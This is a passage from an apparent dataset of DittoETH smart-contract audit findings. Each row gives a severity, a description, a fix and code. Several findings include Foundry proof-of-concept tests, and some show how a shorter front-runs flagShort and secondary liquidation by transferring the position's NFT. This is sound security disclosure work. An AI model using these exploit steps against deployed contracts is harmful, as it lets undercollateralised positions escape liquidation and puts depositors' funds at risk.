run on DittoETH to not be perjudicated of this protocol externalization to all the users that have deposited.","```\\n // This is called by the base ERC20 contract before all transfer, mint, and burns\\n function _beforeTokenTransfer(address from, address, uint256) internal override {\\n // Don't run check if this is a mint transaction\\n if (from != address(0)) {\\n // Check which block the user's last deposit was\\n bytes32 key = keccak256(abi.encodePacked(""user.deposit.block"", from));\\n uint256 lastDepositBlock = getUint(key);\\n if (lastDepositBlock > 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(""dao.protocol.setting.network""), ""network.reth.deposit.delay"")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, ""Not enough time has passed since deposit"");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n" +ETH cannot always be unstaked using Rocket Pool,low,"The protocol lets users unstake Ethereum using any bridge they want. Rocket Pool may not have enough ETH to satisfy unstake transactions, this will cause the transaction to revert.\\nWhen users try to unstake ETH using Rocket Pool, the transaction may revert because Rocket Pool may not have enough ETH in its deposit pool and rEth contract to satisfy the unstake request. Rocket pool sources ETH for unstaking from the rEth contract and deposit pool. When they are empty it cannot satisfy unstake requests. More information can be found in the Unstake section of the rocketPool documentation.\\nThe pools have been empty before. Here's a proof of concept of failed withdrawals when Rocket Pool's rEth contract and deposit pool were empty at block 15361748.\\n```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(""MAINNET_RPC_URL"");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(""Insufficient ETH balance for exchange"");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n","Check if Rocket Pool has enough ETH and if it doesn't, rEth can be exchanged for ETH on a DEX and sent to the user.",If Rocket Pool's rEth contract and deposit Pool do not have enough ETH to satisfy an unstake transaction the transaction will revert.,"```\\n function testWithdrawETHfromRocketPool() public{\\n string memory MAINNET_RPC_URL = vm.envString(""MAINNET_RPC_URL"");\\n uint256 mainnetFork = vm.createFork(MAINNET_RPC_URL, 15361748);\\n\\n RocketTokenRETHInterface rEth = RocketTokenRETHInterface(0xae78736Cd615f374D3085123A210448E74Fc6393);\\n vm.selectFork(mainnetFork);\\n uint totalCollateral = rEth.getTotalCollateral();\\n assertEq(totalCollateral, 0); // pools are empty\\n\\n address owner = 0x50A78DFb9F5CC22ac8ffA90FA2B6C595881CCb97; // has rEth at block 15361748\\n uint rEthBalance = rEth.balanceOf(owner);\\n assertGt(rEthBalance, 0);\\n \\n vm.expectRevert(""Insufficient ETH balance for exchange"");\\n vm.prank(owner); \\n rEth.burn(rEthBalance);\\n }\\n```\\n" +Users can avoid liquidation while being under the primary liquidation ratio if on the last short record,high,"The protocol permits users to maintain up to 254 concurrent short records. When this limit is reached, any additional orders are appended to the final position, rather than creating a new one. A short record is subject to flagging if it breaches the primary liquidation ratio set by the protocol, leading to potential liquidation if it remains below the threshold for a predefined period.\\nThe vulnerability emerges from the dependency of liquidation times on the `updatedAt` value of shorts. For the last short record, the appending of any new orders provides an alternative pathway for updating the `updatedAt` value of shorts, enabling users to circumvent liquidation by submitting minimal shorts to block liquidation by adjusting the time difference, thus avoiding liquidation even when they do not meet the collateral requirements for a healthy state.\\nlets take a look at the code to see how this works.\\nFlagging of Short Record:\\nThe `flagShort` function allows a short to be flagged if it's under `primaryLiquidationCR`, subsequently invoking `setFlagger` which updates the short's `updatedAt` timestamp to the current time.\\n```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n\\nLiquidation Eligibility Check:\\nThe `_canLiquidate` function assesses whether the flagged short is still under `primaryLiquidationCR` after a certain period and if it's eligible for liquidation, depending on the `updatedAt` timestamp and various liquidation time frames.\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n {\\n // Initial code\\n\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n\\n if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n\\n return true;\\n }\\n }\\n}\\n```\\n\\nShort Record Merging:\\nFor the last short record, the `fillShortRecord` function combines new matched shorts with the existing one, invoking the `merge` function, which updates the `updatedAt` value to the current time.\\n```\\nfunction fillShortRecord(\\n address asset,\\n address shorter,\\n uint8 shortId,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint256 ercDebtRate,\\n uint256 zethYieldRate\\n ) internal {\\n AppStorage storage s = appStorage();\\n\\n uint256 ercDebtSocialized = ercAmount.mul(ercDebtRate);\\n uint256 yield = collateral.mul(zethYieldRate);\\n\\n STypes.ShortRecord storage short = s.shortRecords[asset][shorter][shortId];\\n if (short.status == SR.Cancelled) {\\n short.ercDebt = short.collateral = 0;\\n }\\n\\n short.status = status;\\n LibShortRecord.merge(\\n short,\\n ercAmount,\\n ercDebtSocialized,\\n collateral,\\n yield,\\n LibOrders.getOffsetTimeHours()\\n );\\n }\\n```\\n\\nIn the merge function we see that we update the updatedAt value to creationTime which is LibOrders.getOffsetTimeHours().\\n```\\nfunction merge(\\n STypes.ShortRecord storage short,\\n uint88 ercDebt,\\n uint256 ercDebtSocialized,\\n uint88 collateral,\\n uint256 yield,\\n uint24 creationTime\\n ) internal {\\n // Resolve ercDebt\\n ercDebtSocialized += short.ercDebt.mul(short.ercDebtRate);\\n short.ercDebt += ercDebt;\\n short.ercDebtRate = ercDebtSocialized.divU64(short.ercDebt);\\n // Resolve zethCollateral\\n yield += short.collateral.mul(short.zethYieldRate);\\n short.collateral += collateral;\\n short.zethYieldRate = yield.divU80(short.collateral);\\n // Assign updatedAt\\n short.updatedAt = creationTime;\\n }\\n```\\n\\nThis means that even if the position was flagged and is still under the `primaryLiquidationCR`, it cannot be liquidated as the `updatedAt` timestamp has been updated, making the time difference not big enough.\\n","Impose stricter conditions for updating the last short record when the position is flagged and remains under the `primaryLiquidationCR` post-merge, similar to how the `combineShorts` function works.\\n```\\nfunction createShortRecord(\\n address asset,\\n address shorter,\\n SR status,\\n uint88 collateral,\\n uint88 ercAmount,\\n uint64 ercDebtRate,\\n uint80 zethYieldRate,\\n uint40 tokenId\\n ) internal returns (uint8 id) {\\n AppStorage storage s = appStorage();\\n\\n // Initial code\\n\\n } else {\\n // All shortRecordIds used, combine into max shortRecordId\\n id = Constants.SHORT_MAX_ID;\\n fillShortRecord(\\n asset,\\n shorter,\\n id,\\n status,\\n collateral,\\n ercAmount,\\n ercDebtRate,\\n zethYieldRate\\n );\\n\\n // If the short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n if (Constants.SHORT_MAX_ID.shortFlagExists) {\\n if (\\n Constants.SHORT_MAX_ID.getCollateralRatioSpotPrice(\\n LibOracle.getSavedOrSpotOraclePrice(_asset)\\n ) < LibAsset.primaryLiquidationCR(_asset)\\n ) revert Errors.InsufficientCollateral();\\n // Resulting combined short has sufficient c-ratio to remove flag\\n Constants.SHORT_MAX_ID.resetFlag();\\n }\\n }\\n }\\n```\\n",This allows a user with a position under the primaryLiquidationCR to avoid primary liquidation even if the short is in the valid time ranges for liquidation.,"```\\nfunction flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n {\\n // initial code\\n\\n short.setFlagger(cusd, flaggerHint);\\n emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n }\\n```\\n" +Incorrect require in setter,low,"There are 3 setters in `OwnerFacet.sol` which require statement doesn't match with the error message.\\n`_setInitialMargin`, `_setPrimaryLiquidationCR` and `_setSecondaryLiquidationCR` will revert for the value 100, which will revert with an incorrect error message, which is `""below 1.0""`. When 100 is 1.0, not below.\\n*Instances (3)`\\n```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, ""above max CR"");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].initialMargin, ""above initial margin"");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].primaryLiquidationCR, ""above primary liquidation"");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n\\nAs it is contrastable, in the below functions, this check is done correctly:\\n```\\n function _setForcedBidPriceBuffer(address asset, uint8 value) private {\\n require(value >= 100, ""below 1.0"");\\n require(value <= 200, ""above 2.0"");\\n s.asset[asset].forcedBidPriceBuffer = value;\\n }\\n\\n function _setMinimumCR(address asset, uint8 value) private {\\n require(value >= 100, ""below 1.0"");\\n require(value <= 200, ""above 2.0"");\\n s.asset[asset].minimumCR = value;\\n require(\\n LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n ""above secondary liquidation""\\n );\\n }\\n```\\n","Value to which is checked the `>` operator should be 101, not 100.","The incorrect value for the require statement could lead to a restriction of precion for this parameters, it wouldn't be possible to input a net value of 100.","```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, ""above max CR"");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].initialMargin, ""above initial margin"");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, ""below 1.0""); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, ""above 5.0"");\\n require(value < s.asset[asset].primaryLiquidationCR, ""above primary liquidation"");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n" +Unhandled chainlink revert in case its multisigs block access to price feeds,low,"In some extreme cases, oracles can be taken offline or token prices can fall to zero. Therefore a call to `latestRoundData` could potentially revert and none of the circuit breakers would fallback to query any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle's scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n""While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly"".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is imperative to note that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, In order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains command and can adeptly manage any errors in a secure and explicit manner.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFaucet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187","Encase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.","If a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.","```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n" +Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation,high,"A shorter can keep a unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner)\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different informations, such as how much collateral is backing the short, and how much debt it owe (this ratio is called Collateral Ratio or CR) At any time, any user can flag someone's else SR as ""dangerous"", if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which check through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled` If the SR is valid, then its debt/collateral ratio is verified, and if its below a specific threshold, flagged. But that also means that if a SR is considered invalid, it cannot be flagged. And it seems there is a way for the owner of a SR to cancel its SR while still holding the position.\\nThe owner of a SR can mint an NFT to represent it and make it transferable. This is done in 5 steps:\\n`TransferFrom` verify usual stuff regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verify that SR is not `flagged` nor `Cancelled`\\nSR is deleted (setting its status to Cancelled)\\na new SR is created with same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has a SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls flagShorton SR_1, the tx is sent to the mempool\\nAlice is watching the mempool, and don't want her SR to be flagged:\\nShe front-run Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nThe SR_1 is ""deleted"" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of the `onlyValidShortRecord`\\nAlice can do this trick again to keep here undercol SR until it can become dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR<1.5), `liquidateSecondary` is also DoS'd as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol` :\\nFront-running flag\\n```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address aliceThirdAddr = makeAddr(""AliceThirdAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //set cRatio below 1.1\\n setETH(700 ether);\\n \\n //Alice is still blocking all attempts to flag her short by transfering it to her secondary address by front-running Bob\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n //Alice front-run (again// rest of code) Bob and transfers the NFT to a third address she owns\\n vm.prank(aliceSecondAddr);\\n diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n //Bob's try again on the new address, but its attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n depositUsd(bob, shortRecord.ercDebt);\\n vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n }\\n```\\n",Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation,"Because of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.","```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr(""Alice""); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr(""AliceSecondAddr"");\\n address bob = makeAddr(""Bob""); //Bob will try to flag Alice's short \\n address randomUser = makeAddr(""randomUser""); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n" +Previous NFT owner can burn NFT from the new owner,high,"Short records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in line of the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one being even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as a NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint a NFT for the short via the `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates the outline issue 3 above:\\n",Consider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.,"The previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. This renders the short record unusable, and funds (collateral) associated with the short record are lost.","```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n" +Instant arbitrage opportunity through rETH and stETH price discrepancy,low,"User can choose to withdraw their zETH to be a rETH or stETH, while in reality most user will choose the best return (highest value between rETH and stETH), instant arbitrage will happen and this will trigger pool imbalance, draining one over the other.\\nIn DittoETH, they accept two special types of Ethereum tokens: rETH and stETH. These tokens are based on regular ETH but are designed to stay close in value to one regular Ether. However, in reality, they can have slightly different values. rETH, stETH.\\nIn practice, when user want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system doesn't really care which one you put in when a user first deposited their asset.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get a zeth, and then withdraw the more valuable rETH and stETH. a quick way to make some extra profit\\nAs we can see on line 110-112, the rETH or stETH withdrawn is depends on `ethAmount`, which from `_ethConversion` it's amount is 'equal' between rETH and stETH\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n",Consider to use oracle to adjust the price difference between rETH and stETH,"Instant arbitrage opportunity through rETH and stETH price discrepancy, will also trigger imbalance between rETH and stETH pool.","```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n" +Division before multiplication results in lower `dittoMatchedShares` distributed to users,medium,"Shares amount is rounded down to number of days staked. Max truncation is 1 day, min time is 14 days. At most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days`, `eth = 1e18`. Expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. Actual result is `1e18 * (14.99 / 1) = 14e18 